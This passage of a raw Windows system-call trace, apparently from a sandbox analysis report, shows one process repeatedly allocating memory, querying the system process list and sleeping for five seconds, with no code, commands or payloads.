returned 0x0 [0234.846] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0234.846] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0234.852] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0234.853] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0234.854] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0234.854] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0234.855] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0234.855] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0234.856] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0234.861] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0234.862] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0234.863] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0234.863] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0234.864] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0234.865] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0234.865] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0234.868] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0234.870] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0234.872] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0234.872] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0234.872] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0234.873] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0234.873] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0234.876] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0234.877] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0234.879] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0234.879] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0234.879] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0234.880] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0234.880] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0234.884] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0234.884] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0234.886] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0234.886] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0234.887] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0234.888] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0234.888] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0234.893] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0234.894] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0234.895] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0234.895] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0234.896] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0234.896] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0234.897] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0234.901] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0234.902] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0234.904] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0234.904] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0234.905] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0234.905] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0234.905] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0234.908] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0234.909] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0234.911] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0234.911] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0234.912] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0234.912] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0234.912] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0234.915] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0234.916] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0234.918] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0234.918] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0234.919] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0234.919] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0234.919] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0234.922] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0234.923] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0234.925] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0234.925] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0234.925] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0234.926] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0234.926] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0234.931] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0234.932] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0234.934] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0234.934] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0234.934] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0234.935] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0234.935] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0234.938] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0234.939] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0234.941] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0234.941] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0234.942] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0234.942] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0234.942] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0234.946] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0234.946] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0234.948] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0234.948] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0234.949] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0234.949] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0234.950] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0234.953] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0234.954] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0234.956] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0234.956] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0234.956] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0234.957] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0234.957] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0234.961] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0234.962] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0234.963] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0234.963] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0234.965] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0234.965] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0234.965] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0234.971] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0234.973] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0234.974] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0234.974] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0234.975] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0234.976] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0234.976] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0234.981] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0234.982] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0234.984] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0234.984] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0234.985] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0234.985] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0234.985] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0234.988] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0234.989] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0234.991] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0234.991] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0234.992] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0234.992] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0234.992] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0235.000] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0235.001] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0235.003] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0235.004] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0235.005] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0235.005] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0235.005] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0235.009] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0235.010] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0235.011] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0235.011] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0235.012] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0235.012] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0235.012] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0235.017] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0235.018] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0235.019] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, 